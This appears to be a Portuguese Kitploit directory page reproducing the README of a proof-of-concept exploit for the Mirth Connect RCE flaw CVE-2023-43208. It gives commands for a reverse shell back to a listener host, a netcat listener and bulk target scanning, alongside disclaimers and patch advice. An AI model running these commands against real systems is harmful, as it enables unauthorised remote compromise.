Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-2023-43208 — Um exploit de prova de conceito para CVE-2023-43208, uma vulnerabilidade de execução remota de código no Mirth Connect anterior à versão 4.4.1. | Kitploit
Ferramentas/GitHubGitHub/mkirahmet/poc-2023-43208
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubmkirahmet/poc-2023-43208

PoC-2023-43208

Um exploit de prova de conceito para CVE-2023-43208, uma vulnerabilidade de execução remota de código no Mirth Connect anterior à versão 4.4.1.

Ver Repositório
3há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-43208-EXPLOIT

Exploit de Execução Remota de Código (RCE) no Mirth Connect

Python Version Version CVE Lab Use Only

⚠️ APENAS PARA FINS EDUCACIONAIS E DE LABORATÓRIO ⚠️

Um exploit de prova de conceito para CVE-2023-43208, uma vulnerabilidade de execução remota de código no Mirth Connect anterior à versão 4.4.1.

🚨 AVISO LEGAL IMPORTANTE

Esta ferramenta é estritamente para:

  • 🧪 Propósitos educacionais
  • 🔬 Testes de segurança autorizados em ambientes de laboratório
  • 📚 Pesquisa e aprendizado em cibersegurança

NÃO USE:

  • ❌ Contra sistemas que você não possui
  • ❌ Sem permissão explícita por escrito
  • ❌ Em ambientes de produção
  • ❌ Para fins ilegais ou maliciosos

Você é responsável por cumprir todas as leis e regulamentos aplicáveis. O uso indevido desta ferramenta pode resultar em acusações criminais.

📋 Descrição

Este exploit visa a vulnerabilidade de desserialização de XML no endpoint /api/users do Mirth Connect, permitindo execução remota de código não autenticada em versões afetadas (< 4.4.1).

Esta é uma vulnerabilidade CRÍTICA e deve ser testada APENAS em ambientes de laboratório isolados com seus próprios sistemas.

🔧 Requisitos

  • Python 3.7 ou superior
  • Pacotes necessários listados em requirements.txt
  • UM AMBIENTE DE LABORATÓRIO com uma instância vulnerável do Mirth Connect

🚀 Instalação

Clone o repositório

git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT

Instale os requisitos

pip install -r requirements.txt 💻 Uso (APENAS PARA LABORATÓRIO) Modo Interativo (Recomendado para Laboratório) bash python exploit.py Modo Linha de Comando bash

Exploração de alvo único (APENAS PARA LABORATÓRIO)

python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444

Escanear múltiplos alvos a partir de arquivo (APENAS PARA LABORATÓRIO)

python exploit.py -f targets.txt -t 50 -o vulnerable.txt

Modo não interativo (APENAS PARA LABORATÓRIO)

python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive Opções text -u, --url URL do alvo a explorar (APENAS PARA LABORATÓRIO) -lh, --lhost Host de escuta (seu IP) -lp, --lport Porta de escuta -f, --file Arquivo contendo URLs de alvos para escanear -o, --output Arquivo de saída para salvar os resultados da varredura -t, --threads Número de threads para varredura (padrão: 50) --no-interactive Executar em modo não interativo 🎯 Exemplo de Ambiente de Laboratório Configure seu laboratório:

Instale a versão vulnerável do Mirth Connect (< 4.4.1) em uma VM isolada

Use uma rede controlada (ex.: NAT/Somente-hospedeiro no VirtualBox/VMware)

Nunca exponha à internet

Inicie seu listener:

ncat -lnvp 4444

ou

nc -lnvp 4444 Execute o exploit em seu laboratório:

python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444 🧪 Requisitos do Ambiente de Teste Rede/VLAN isolada

Apenas máquinas virtuais

Nenhum dado de produção

Regras de firewall bloqueando acesso externo

Autorização adequada documentada

📝 Detalhes Técnicos Tipo de Vulnerabilidade: Desserialização XML RCE

Versões Afetadas: Mirth Connect < 4.4.1

Versão Corrigida: 4.4.1 e superiores

Pontuação CVSS: 9.8 (Crítica)

Vetor de Ataque: Rede

Autenticação: Nenhuma necessária

O exploit usa gadgets do Commons Collections para alcançar RCE através do endpoint /api/users.

🛡️ Medidas de Proteção Se você está executando o Mirth Connect:

✅ Atualize para a versão 4.4.1 ou posterior

✅ Restrinja o acesso de rede às interfaces administrativas

✅ Implemente autenticação adequada

✅ Monitore por payloads XML suspeitos

👥 Créditos Autores Originais: K3ysTr0K3R & Chocapikk

Modificado por: M0h4

CVE: CVE-2023-43208

⚠️ AVISO FINAL

╔══════════════════════════════════════════════════════════════╗ ║ ESTA FERRAMENTA É APENAS PARA USO EM LABORATÓRIO ║ ║ O uso não autorizado é ILEGAL e ANTIÉTICO ║ ║ Você assume TODO o risco e responsabilidade ║ ║ O autor NÃO aceita responsabilidade por uso indevido ║ ╚══════════════════════════════════════════════════════════════╝

Baixar ferramenta